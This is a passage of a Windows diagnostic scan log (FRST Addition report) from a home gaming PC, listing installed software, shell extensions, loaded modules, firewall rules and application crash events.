Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.40664 (HKLM-x32\...\{D401961D-3A20-3AC7-943B-6139D5BD490A}) (Version: 12.0.40664 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.40664 (HKLM-x32\...\{8122DAB1-ED4D-3676-BB0A-CA368196543E}) (Version: 12.0.40664 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2015-2019 Redistributable (x86) - 14.28.29334 (HKLM-x32\...\{b2d0f752-adc5-496e-8f70-8669de01f746}) (Version: 14.28.29334.0 - Microsoft Corporation)
Microsoft Visual C++ 2015-2022 Redistributable (x64) - 14.30.30704 (HKLM-x32\...\{57a73df6-4ba9-4c1d-bbbb-517289ff6c13}) (Version: 14.30.30704.0 - Microsoft Corporation)
Microsoft Visual C++ 2019 X86 Additional Runtime - 14.28.29334 (HKLM-x32\...\{14C49FC8-3E9B-4F29-8526-26629B5CF30B}) (Version: 14.28.29334 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2019 X86 Minimum Runtime - 14.28.29334 (HKLM-x32\...\{0D01A812-82A1-481F-8546-8E28E976F8DF}) (Version: 14.28.29334 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2022 X64 Additional Runtime - 14.30.30704 (HKLM\...\{6DB765A8-05AF-49A1-A71D-6F645EE3CE41}) (Version: 14.30.30704 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2022 X64 Minimum Runtime - 14.30.30704 (HKLM\...\{662A0088-6FCD-45DD-9EA7-68674058AED5}) (Version: 14.30.30704 - Microsoft Corporation) Hidden
Microsoft XNA Framework Redistributable 4.0 Refresh (HKLM-x32\...\{D69C8EDE-BBC5-436B-8E0E-C5A6D311CF4F}) (Version: 4.0.30901.0 - Microsoft Corporation)
Minecraft Launcher (HKLM-x32\...\{27B34E47-68AE-4802-822A-9F0C187AF84A}) (Version: 1.0.0.0 - Mojang)
Mozilla Firefox (x64 en-US) (HKLM\...\Mozilla Firefox 102.0.1 (x64 en-US)) (Version: 102.0.1 - Mozilla)
Mozilla Maintenance Service (HKLM\...\MozillaMaintenanceService) (Version: 89.0.2 - Mozilla)
NVIDIA FrameView SDK 1.2.7521.31103277 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_FrameViewSdk) (Version: 1.2.7521.31103277 - NVIDIA Corporation)
NVIDIA GeForce Experience 3.25.1.27 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Version: 3.25.1.27 - NVIDIA Corporation)
NVIDIA Graphics Driver 512.59 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 512.59 - NVIDIA Corporation)
NVIDIA HD Audio Driver 1.3.39.3 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_HDAudio.Driver) (Version: 1.3.39.3 - NVIDIA Corporation)
NVIDIA PhysX System Software 9.21.0713 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.21.0713 - NVIDIA Corporation)
NVIDIA USBC Driver 1.46.831.832 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_USBC) (Version: 1.46.831.832 - NVIDIA Corporation)
OEM Application Profile (HKLM-x32\...\{84AD2AF7-10C8-0395-66F9-FFAEB4C5DBF1}) (Version: 1.00.0000 - Advanced Micro Devices, Inc.)
ONN. (HKLM-x32\...\ONN.) (Version: 1.0.0.5.05 - )
OpenAL (HKLM-x32\...\OpenAL) (Version: - )
Origin (HKLM-x32\...\Origin) (Version: 10.5.113.50894 - Electronic Arts, Inc.)
Overwatch (HKLM-x32\...\Overwatch) (Version: - Blizzard Entertainment)
PCSX2 - Playstation 2 Emulator (HKLM-x32\...\pcsx2) (Version: 1.6.0 - PCSX2 Team)
qBittorrent 4.4.2 (HKLM-x32\...\qBittorrent) (Version: 4.4.2 - The qBittorrent project)
r2modman 3.1.25 (HKU\S-1-5-21-2826498334-1472090739-1589450912-1002\...\ac231ef6-6414-5f8d-b36f-3b57705721dd) (Version: 3.1.25 - ebkr)
Riot Vanguard (HKLM\...\Riot Vanguard) (Version: - Riot Games, Inc.)
Roblox Player for Miggy (HKU\S-1-5-21-2826498334-1472090739-1589450912-1002\...\roblox-player) (Version: - Roblox Corporation)
Spotify (HKU\S-1-5-21-2826498334-1472090739-1589450912-1002\...\Spotify) (Version: 1.1.89.862.g94554d24 - Spotify AB)
Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
Streamlabs Desktop 1.6.4 (HKLM\...\029c4619-0385-5543-9426-46f9987161d9) (Version: 1.6.4 - General Workings, Inc.)
TeamViewer (HKLM-x32\...\TeamViewer) (Version: 15.8.3 - TeamViewer)
Ubisoft Connect (HKLM-x32\...\Uplay) (Version: 112.3 - Ubisoft)
Update for Windows 10 for x64-based Systems (KB4023057) (HKLM\...\{0BAA0A93-3AD3-4B19-9105-4C8C3FA92A83}) (Version: 2.67.0.0 - Microsoft Corporation) Hidden
Update for Windows 10 for x64-based Systems (KB4480730) (HKLM\...\{0746492E-47B6-4251-940C-44462DFD74BB}) (Version: 2.55.0.0 - Microsoft Corporation)
UpdateAssistant (HKLM\...\{F339C545-24DC-4870-AA32-6EB6B0500B95}) (Version: 1.24.0.0 - Microsoft Corporation) Hidden
UXP WebView Support (HKLM-x32\...\UXPW_1_1_0) (Version: 1.1.0 - Adobe Inc.)
VALORANT (HKU\S-1-5-21-2826498334-1472090739-1589450912-1002\...\Riot Game valorant.live) (Version: - Riot Games, Inc)
Vortex (HKLM\...\57979c68-f490-55b8-8fed-8b017a5af2fe) (Version: 1.5.13 - Black Tree Gaming Ltd.)
Windows 10 Update Assistant (HKLM-x32\...\{D5C69738-B486-402E-85AC-2456D98A64E4}) (Version: 1.4.9200.22925 - Microsoft Corporation)
Windows PC Health Check (HKLM\...\{77ACFAF7-E5AB-410D-BA14-BBEBF89422DE}) (Version: 3.1.2109.29003 - Microsoft Corporation)
Zoom (HKU\S-1-5-21-2826498334-1472090739-1589450912-1002\...\ZoomUMX) (Version: 5.10.4 (5035) - Zoom Video Communications, Inc.)
Packages:
=========
Adobe Notification Client -> C:\Program Files\WindowsApps\AdobeNotificationClient_3.0.1.1_x86__enpm4xejd91yc [2022-04-20] (Adobe Systems Incorporated)
BreeZip -> C:\Program Files\WindowsApps\3138AweZip.AweZip_1.4.15.0_x86__ffd303wmbhcjt [2022-07-13] (BreeZip)
Microsoft Advertising SDK for XAML -> C:\Program Files\WindowsApps\Microsoft.Advertising.Xaml_10.1811.1.0_x64__8wekyb3d8bbwe [2021-03-15] (Microsoft Corporation) [MS Ad]
Microsoft Advertising SDK for XAML -> C:\Program Files\WindowsApps\Microsoft.Advertising.Xaml_10.1811.1.0_x86__8wekyb3d8bbwe [2021-03-15] (Microsoft Corporation) [MS Ad]
Microsoft Solitaire Collection -> C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_4.13.7040.0_x64__8wekyb3d8bbwe [2022-07-13] (Microsoft Studios) [MS Ad]
Minecraft Launcher -> C:\Program Files\WindowsApps\Microsoft.4297127D64EC6_1.1.17.0_x64__8wekyb3d8bbwe [2022-06-08] (Microsoft Studios)
NVIDIA Control Panel -> C:\Program Files\WindowsApps\NVIDIACorp.NVIDIAControlPanel_8.1.962.0_x64__56jybvy8sckqj [2022-04-26] (NVIDIA Corp.)
Photos Media Engine Add-on -> C:\Program Files\WindowsApps\Microsoft.Photos.MediaEngineDLC_1.0.0.0_x64__8wekyb3d8bbwe [2022-01-07] (Microsoft Corporation)
Realtek Audio Control -> C:\Program Files\WindowsApps\RealtekSemiconductorCorp.RealtekAudioControl_1.2.175.0_x64__dt26b99r8h8gj [2020-07-31] (Realtek Semiconductor Corp)
Visage -> C:\Program Files\WindowsApps\SadSquareStudio.Visage_1.1.0.0_x64__855q6fdw1qbrg [2022-06-22] (SadSquare Studio)
WhatsApp Desktop -> C:\Program Files\WindowsApps\5319275A.WhatsAppDesktop_2.2222.12.0_x64__cv1g1gvanyjgm [2022-07-01] (WhatsApp Inc.)
Word Mobile -> C:\Program Files\WindowsApps\Microsoft.Office.Word_16001.14326.21062.0_x64__8wekyb3d8bbwe [2022-07-13] (Microsoft Corporation)
==================== Custom CLSID (Whitelisted): ==============
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
CustomCLSID: HKU\S-1-5-21-2826498334-1472090739-1589450912-1002_Classes\CLSID\{00020420-0000-0000-C000-000000000046}\InprocServer32 -> C:\WINDOWS\system32\oleaut32.dll (Microsoft Windows -> Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-2826498334-1472090739-1589450912-1002_Classes\CLSID\{00020421-0000-0000-C000-000000000046}\InprocServer32 -> C:\WINDOWS\system32\oleaut32.dll (Microsoft Windows -> Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-2826498334-1472090739-1589450912-1002_Classes\CLSID\{00020422-0000-0000-C000-000000000046}\InprocServer32 -> C:\WINDOWS\system32\oleaut32.dll (Microsoft Windows -> Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-2826498334-1472090739-1589450912-1002_Classes\CLSID\{00020423-0000-0000-C000-000000000046}\InprocServer32 -> C:\WINDOWS\system32\oleaut32.dll (Microsoft Windows -> Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-2826498334-1472090739-1589450912-1002_Classes\CLSID\{00020424-0000-0000-C000-000000000046}\InprocServer32 -> C:\WINDOWS\system32\oleaut32.dll (Microsoft Windows -> Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-2826498334-1472090739-1589450912-1002_Classes\CLSID\{00020425-0000-0000-C000-000000000046}\InprocServer32 -> C:\WINDOWS\system32\oleaut32.dll (Microsoft Windows -> Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-2826498334-1472090739-1589450912-1002_Classes\CLSID\{0E270DAA-1BE6-48F2-AC49-317A81924068} -> [Creative Cloud Files] => C:\Users\Miggy\Creative Cloud Files [2020-08-04 16:40]
CustomCLSID: HKU\S-1-5-21-2826498334-1472090739-1589450912-1002_Classes\CLSID\{2F81B25E-7507-4844-BFF2-77D2CC24CED4}\localserver32 -> C:\Program Files\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe (Adobe Inc. -> Adobe Inc.)
CustomCLSID: HKU\S-1-5-21-2826498334-1472090739-1589450912-1002_Classes\CLSID\{9E121B07-D732-48C1-94D0-77C233EAE0F3} -> [MEGAsync] => C:\Users\Miggy\Documents\MEGAsync [2022-06-05 15:01]
CustomCLSID: HKU\S-1-5-21-2826498334-1472090739-1589450912-1002_Classes\CLSID\{d1b22d3d-8585-53a6-acb3-0e803c7e8d2a}\localserver32 -> "C:\Users\Miggy\AppData\Local\Microsoft\Teams\current\Teams.exe" --toast => No File
CustomCLSID: HKU\S-1-5-21-2826498334-1472090739-1589450912-1002_Classes\CLSID\{e8c77137-e224-5791-b6e9-ff0305797a13}\InprocServer32 -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect64.dll (Adobe Inc. -> Adobe Systems)
ShellIconOverlayIdentifiers: [ MEGA (Pending)] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => C:\Users\Miggy\AppData\Local\MEGAsync\ShellExtX64.dll [2022-06-23] (Mega Limited -> )
ShellIconOverlayIdentifiers: [ MEGA (Synced)] -> {05B38830-F4E9-4329-978B-1DD28605D202} => C:\Users\Miggy\AppData\Local\MEGAsync\ShellExtX64.dll [2022-06-23] (Mega Limited -> )
ShellIconOverlayIdentifiers: [ MEGA (Syncing)] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => C:\Users\Miggy\AppData\Local\MEGAsync\ShellExtX64.dll [2022-06-23] (Mega Limited -> )
ShellIconOverlayIdentifiers: [ AccExtIco1] -> {AB9CF9F8-8A96-4F9D-BF21-CE85714C3A47} => C:\Program Files (x86)\Common Files\Adobe\CoreSyncExtension\CoreSync_x64.dll [2022-06-29] (Adobe Inc. -> )
ShellIconOverlayIdentifiers: [ AccExtIco2] -> {853B7E05-C47D-4985-909A-D0DC5C6D7303} => C:\Program Files (x86)\Common Files\Adobe\CoreSyncExtension\CoreSync_x64.dll [2022-06-29] (Adobe Inc. -> )
ShellIconOverlayIdentifiers: [ AccExtIco3] -> {42D38F2E-98E9-4382-B546-E24E4D6D04BB} => C:\Program Files (x86)\Common Files\Adobe\CoreSyncExtension\CoreSync_x64.dll [2022-06-29] (Adobe Inc. -> )
ContextMenuHandlers1: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2021-05-06] (Igor Pavlov) [File not signed]
ContextMenuHandlers1: [AccExt] -> {2A118EB5-5797-4F5E-8B3D-F4ECBA3C98E4} => C:\Program Files (x86)\Common Files\Adobe\CoreSyncExtension\CoreSync_x64.dll [2022-06-29] (Adobe Inc. -> )
ContextMenuHandlers1: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => C:\Users\Miggy\AppData\Local\MEGAsync\ShellExtX64.dll [2022-06-23] (Mega Limited -> )
ContextMenuHandlers2: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => C:\Users\Miggy\AppData\Local\MEGAsync\ShellExtX64.dll [2022-06-23] (Mega Limited -> )
ContextMenuHandlers3: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => C:\Users\Miggy\AppData\Local\MEGAsync\ShellExtX64.dll [2022-06-23] (Mega Limited -> )
ContextMenuHandlers4: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2021-05-06] (Igor Pavlov) [File not signed]
ContextMenuHandlers4: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => C:\Users\Miggy\AppData\Local\MEGAsync\ShellExtX64.dll [2022-06-23] (Mega Limited -> )
ContextMenuHandlers5: [ACE] -> {5E2121EE-0300-11D4-8D3B-444553540000} => C:\Program Files\AMD\CNext\CNext\atiacm64.dll [2017-04-24] (Advanced Micro Devices, Inc.) [File not signed]
ContextMenuHandlers5: [NvCplDesktopContext] -> {3D1975AF-48C6-4f8e-A182-BE0E08FA86A9} => C:\WINDOWS\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_4d7400884d0d52e3\nvshext.dll [2022-04-21] (Nvidia Corporation -> NVIDIA Corporation)
ContextMenuHandlers6: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2021-05-06] (Igor Pavlov) [File not signed]
ContextMenuHandlers6: [AccExt] -> {2A118EB5-5797-4F5E-8B3D-F4ECBA3C98E4} => C:\Program Files (x86)\Common Files\Adobe\CoreSyncExtension\CoreSync_x64.dll [2022-06-29] (Adobe Inc. -> )
==================== Codecs (Whitelisted) ====================
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
HKLM\...\Drivers32: [vidc.VP60] => C:\WINDOWS\SysWOW64\vp6vfw.dll [447752 2014-09-16] (Electronic Arts -> On2.com)
HKLM\...\Drivers32: [vidc.VP61] => C:\WINDOWS\SysWOW64\vp6vfw.dll [447752 2014-09-16] (Electronic Arts -> On2.com)
==================== Shortcuts & WMI ========================
==================== Loaded Modules (Whitelisted) =============
2022-07-12 17:36 - 2021-11-11 04:03 - 001495552 _____ () [File not signed] C:\Program Files (x86)\ONN\DuiLib.dll
2022-07-12 17:36 - 2018-09-06 03:45 - 000045056 _____ () [File not signed] C:\Program Files (x86)\ONN\HookDLL.dll
2020-12-26 15:42 - 2022-03-03 19:23 - 126965248 _____ () [File not signed] C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\libcef.dll
2020-12-26 15:42 - 2021-11-17 04:38 - 000384000 _____ () [File not signed] C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\libegl.dll
2020-12-26 15:42 - 2021-11-17 04:38 - 008006656 _____ () [File not signed] C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\libglesv2.dll
2022-07-17 18:38 - 2022-07-17 18:38 - 000257536 _____ () [File not signed] C:\Program Files (x86)\Steam\steamapps\common\Batman Arkham Knight\Binaries\Win64\GFSDK_GodraysLib.x64.dll
2022-07-17 18:38 - 2022-07-17 18:38 - 000045568 _____ () [File not signed] C:\Program Files (x86)\Steam\steamapps\common\Batman Arkham Knight\Binaries\Win64\GFSDK_PSM.win64.dll
2022-07-12 17:36 - 2019-07-18 06:35 - 000049152 _____ (0) [File not signed] C:\Program Files (x86)\ONN\CommFunc.dll
2022-07-12 17:36 - 2019-08-17 03:25 - 000119296 _____ (0) [File not signed] C:\Program Files (x86)\ONN\DrvInDll.dll
2022-07-17 18:37 - 2022-07-17 18:37 - 000113664 _____ (Sony Computer Entertainment Inc.) [File not signed] C:\Program Files (x86)\Steam\steamapps\common\Batman Arkham Knight\Binaries\Win64\libScePad_x64.dll
2020-07-31 18:19 - 2020-07-31 18:19 - 000023040 _____ (Synaptics Incorporated.) [File not signed] C:\Program Files\WindowsApps\RealtekSemiconductorCorp.RealtekAudioControl_1.2.175.0_x64__dt26b99r8h8gj\SynAudSrvDll.dll
2020-12-26 15:42 - 2022-03-03 19:23 - 000983552 _____ (The Chromium Authors) [File not signed] C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\chrome_elf.dll
2022-07-05 18:54 - 2022-07-05 18:54 - 001282048 _____ (The OpenSSL Project, hxxp://www.openssl.org/) [File not signed] C:\Program Files (x86)\Origin\LIBEAY32.dll
2022-07-05 18:54 - 2022-07-05 18:54 - 000279040 _____ (The OpenSSL Project, hxxp://www.openssl.org/) [File not signed] C:\Program Files (x86)\Origin\ssleay32.dll
2022-07-21 15:19 - 2022-07-21 15:19 - 002815488 _____ (The OpenSSL Project, hxxp://www.openssl.org/) [File not signed] C:\Program Files\Electronic Arts\EA Desktop\EA Desktop\libcrypto-1_1-x64.dll
2022-07-21 15:19 - 2022-07-21 15:19 - 000678400 _____ (The OpenSSL Project, hxxp://www.openssl.org/) [File not signed] C:\Program Files\Electronic Arts\EA Desktop\EA Desktop\libssl-1_1-x64.dll
2022-07-05 18:54 - 2022-07-05 18:54 - 001611264 _____ (The Qt Company Ltd) [File not signed] C:\Program Files (x86)\Origin\platforms\qwindows.dll
2022-07-05 18:54 - 2022-07-05 18:54 - 005487104 _____ (The Qt Company Ltd) [File not signed] C:\Program Files (x86)\Origin\Qt5Core.dll
2022-07-05 18:54 - 2022-07-05 18:54 - 005841920 _____ (The Qt Company Ltd) [File not signed] C:\Program Files (x86)\Origin\Qt5Gui.dll
2022-07-05 18:54 - 2022-07-05 18:54 - 001179136 _____ (The Qt Company Ltd) [File not signed] C:\Program Files (x86)\Origin\Qt5Network.dll
2022-07-05 18:54 - 2022-07-05 18:54 - 000146432 _____ (The Qt Company Ltd) [File not signed] C:\Program Files (x86)\Origin\Qt5WebSockets.dll
2022-07-05 18:54 - 2022-07-05 18:54 - 005089792 _____ (The Qt Company Ltd) [File not signed] C:\Program Files (x86)\Origin\Qt5Widgets.dll
2022-07-05 18:54 - 2022-07-05 18:54 - 000184832 _____ (The Qt Company Ltd) [File not signed] C:\Program Files (x86)\Origin\Qt5Xml.dll
2022-07-21 15:19 - 2022-07-21 15:19 - 000046592 _____ (The Qt Company Ltd.) [File not signed] C:\Program Files\Electronic Arts\EA Desktop\EA Desktop\bearer\qgenericbearer.dll
2022-07-21 15:19 - 2022-07-21 15:19 - 006270976 _____ (The Qt Company Ltd.) [File not signed] C:\Program Files\Electronic Arts\EA Desktop\EA Desktop\Qt5Core.dll
2022-07-21 15:19 - 2022-07-21 15:19 - 001389568 _____ (The Qt Company Ltd.) [File not signed] C:\Program Files\Electronic Arts\EA Desktop\EA Desktop\Qt5Network.dll
2022-07-21 15:19 - 2022-07-21 15:19 - 000157184 _____ (The Qt Company Ltd.) [File not signed] C:\Program Files\Electronic Arts\EA Desktop\EA Desktop\Qt5WebSockets.dll
2022-07-21 15:19 - 2022-07-21 15:19 - 000210432 _____ (The Qt Company Ltd.) [File not signed] C:\Program Files\Electronic Arts\EA Desktop\EA Desktop\Qt5Xml.dll
2021-09-14 00:46 - 2021-09-14 00:46 - 005979312 _____ (The Qt Company Oy -> The Qt Company Ltd.) [File not signed] C:\Users\Miggy\AppData\Local\MEGAsync\Qt5Core.dll
==================== Alternate Data Streams (Whitelisted) ========
(If an entry is included in the fixlist, only the ADS will be removed.)
AlternateDataStreams: C:\ProgramData\NvcDispCorePlugin.log:AAE9D2281E [4298]
AlternateDataStreams: C:\ProgramData\NvcDispCorePlugin.log_backup1:E79F04DA79 [4298]
AlternateDataStreams: C:\ProgramData\NVDisplay.ContainerLocalSystem.log:5ACBC90093 [4298]
AlternateDataStreams: C:\ProgramData\NVDisplay.ContainerLocalSystem.log_backup1:A416BDA264 [4298]
AlternateDataStreams: C:\ProgramData\NVDisplayContainerWatchdog.log:204739A7F2 [4298]
AlternateDataStreams: C:\ProgramData\NVDisplayContainerWatchdog.log_backup1:C3CA1050CA [4298]
AlternateDataStreams: C:\ProgramData\rsEngine.config.backup:CF02139FF4 [4298]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\desktop.ini:B1DA6C571C [4298]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Creative Cloud.lnk:7661CCE9BF [4298]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Illustrator 2022.lnk:0BBB729577 [4298]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Photoshop 2022.lnk:638138415C [4298]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Premiere Pro 2022.lnk:C56174E6CE [4298]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\desktop.ini:41964AA945 [4298]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Epic Games Launcher.lnk:BE32D07BC5 [4298]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Firefox.lnk:980850BA8A [4298]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk:8096E45125 [4298]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Edge.lnk:E77773B271 [4298]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Streamlabs Desktop.lnk:578370639A [4298]
AlternateDataStreams: C:\Users\Public\Shared Files:VersionCache [490]
==================== Safe Mode (Whitelisted) ==================
==================== Association (Whitelisted) =================
==================== Internet Explorer (Whitelisted) ==========
==================== Hosts content: =========================
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
2018-04-11 16:38 - 2018-04-11 16:36 - 000000824 _____ C:\WINDOWS\system32\drivers\etc\hosts
==================== Other Areas ===========================
(Currently there is no automatic fix for this section.)
HKU\S-1-5-21-2826498334-1472090739-1589450912-1002\Control Panel\Desktop\\Wallpaper -> C:\Users\Miggy\Downloads\FXHeNR8WYAAmLXM.jpg
DNS Servers: 192.168.1.254
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: )
Windows Firewall is enabled.
==================== MSCONFIG/TASK MANAGER disabled items ==
==================== FirewallRules (Whitelisted) ================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
FirewallRules: [TCP Query User{75F1F7B6-893C-4C9A-8BEB-1A01FE14D19B}C:\users\miggy\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\miggy\appdata\roaming\spotify\spotify.exe (Spotify AB -> Spotify Ltd)
FirewallRules: [UDP Query User{C570E9D4-54C7-4C8E-BFE2-33790B0CDEE4}C:\users\miggy\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\miggy\appdata\roaming\spotify\spotify.exe (Spotify AB -> Spotify Ltd)
FirewallRules: [{512DD18C-E03C-4F68-ADDB-C1B6C668DE92}] => (Allow) C:\Program Files (x86)\Steam\steam.exe (Valve Corp. -> Valve Corporation)
FirewallRules: [{BDFC16B9-6362-4C4F-B63A-563BB28D6D95}] => (Allow) C:\Program Files (x86)\Steam\steam.exe (Valve Corp. -> Valve Corporation)
FirewallRules: [{D375EA9F-C466-429B-9310-86A9AF754CE7}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\steamwebhelper.exe (Valve Corp. -> Valve Corporation)
FirewallRules: [{1111D7E9-0263-4BEA-AE48-5814F94C25AE}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\steamwebhelper.exe (Valve Corp. -> Valve Corporation)
FirewallRules: [TCP Query User{E129FC62-A6F4-43F0-A596-705A65A6ECBE}C:\riot games\riot client\riotclientservices.exe] => (Allow) C:\riot games\riot client\riotclientservices.exe (Riot Games, Inc. -> Riot Games, Inc.)
FirewallRules: [UDP Query User{8B14CB93-57E1-4205-86E0-9D64AD5CD2C2}C:\riot games\riot client\riotclientservices.exe] => (Allow) C:\riot games\riot client\riotclientservices.exe (Riot Games, Inc. -> Riot Games, Inc.)
FirewallRules: [TCP Query User{0F55258B-E84A-4C72-B334-56F8FAF8F9AB}C:\program files (x86)\steam\steamapps\common\batman arkham knight\binaries\win64\batmanak.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\batman arkham knight\binaries\win64\batmanak.exe (Rocksteady Studios Ltd.) [File not signed]
FirewallRules: [UDP Query User{001269EE-BB0B-4D46-9E3F-07C960BA49C3}C:\program files (x86)\steam\steamapps\common\batman arkham knight\binaries\win64\batmanak.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\batman arkham knight\binaries\win64\batmanak.exe (Rocksteady Studios Ltd.) [File not signed]
FirewallRules: [{E4D8E207-53E2-4BCA-857B-95C442C4A003}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google LLC -> Google LLC)
FirewallRules: [{8E1288D1-FF8B-43CF-B774-BAF7368A878E}] => (Allow) C:\Program Files\WindowsApps\Microsoft.SkypeApp_15.86.3409.0_x86__kzf8qxf38zg5c\Skype\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [{07AEC99C-D78B-40D8-81B3-B6A57F65D5B2}] => (Allow) C:\Program Files\WindowsApps\Microsoft.SkypeApp_15.86.3409.0_x86__kzf8qxf38zg5c\Skype\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [{E69E5D28-B7DD-46AB-BEAB-C839E5454B7D}] => (Allow) C:\Program Files\WindowsApps\Microsoft.SkypeApp_15.86.3409.0_x86__kzf8qxf38zg5c\Skype\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [{B37C3BEA-90A8-4571-B32B-A3D32D66E996}] => (Allow) C:\Program Files\WindowsApps\Microsoft.SkypeApp_15.86.3409.0_x86__kzf8qxf38zg5c\Skype\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [{01812E29-A7AD-4EE9-8996-E4D05D2A9287}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Super Animal Royale\Super Animal Royale.exe () [File not signed]
FirewallRules: [{630E1402-F874-4FED-87A1-27FF1098A671}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Super Animal Royale\Super Animal Royale.exe () [File not signed]
==================== Restore Points =========================
18-07-2022 16:49:57 Scheduled Checkpoint
==================== Faulty Device Manager Devices ============
==================== Event log errors: ========================
Application errors:
==================
Error: (07/21/2022 03:23:57 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: RadeonSettings.exe, version: 10.1.1.1682, time stamp: 0x58fea395
Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000
Exception code: 0xc0000005
Fault offset: 0x0000000000000000
Faulting process id: 0x46e0
Faulting application start time: 0x01d89d4fde07bc1b
Faulting application path: C:\Program Files\AMD\CNext\CNext\RadeonSettings.exe
Faulting module path: unknown
Report Id: 48c9ba1f-c205-446b-9247-20458cfebef7
Faulting package full name:
Faulting package-relative application ID:
Error: (07/20/2022 10:32:38 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program EpicGamesLauncher.exe version 14.1.4.0 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Security and Maintenance control panel.
Process ID: d8c
Start Time: 01d89ca434ea1caa
Termination Time: 4294967295
Application Path: C:\Program Files (x86)\Epic Games\Launcher\Portal\Binaries\Win64\EpicGamesLauncher.exe
Report Id: ad46e099-7131-424c-a75c-05dc99cacc33
Faulting package full name:
Faulting package-relative application ID:
Hang type: Top level window is idle
Error: (07/20/2022 06:54:54 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: RadeonSettings.exe, version: 10.1.1.1682, time stamp: 0x58fea395
Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000
Exception code: 0xc0000005
Fault offset: 0x0000000000000000
Faulting process id: 0x26bc
Faulting application start time: 0x01d89ca42b82d203
Faulting application path: C:\Program Files\AMD\CNext\CNext\RadeonSettings.exe
Faulting module path: unknown
Report Id: 07a10fe0-3fa3-4c43-ac44-00c630cdb48a
Faulting package full name:
Faulting package-relative application ID:
Error: (07/20/2022 06:53:02 PM) (Source: Application Error) (EventID: 1000) (User: )
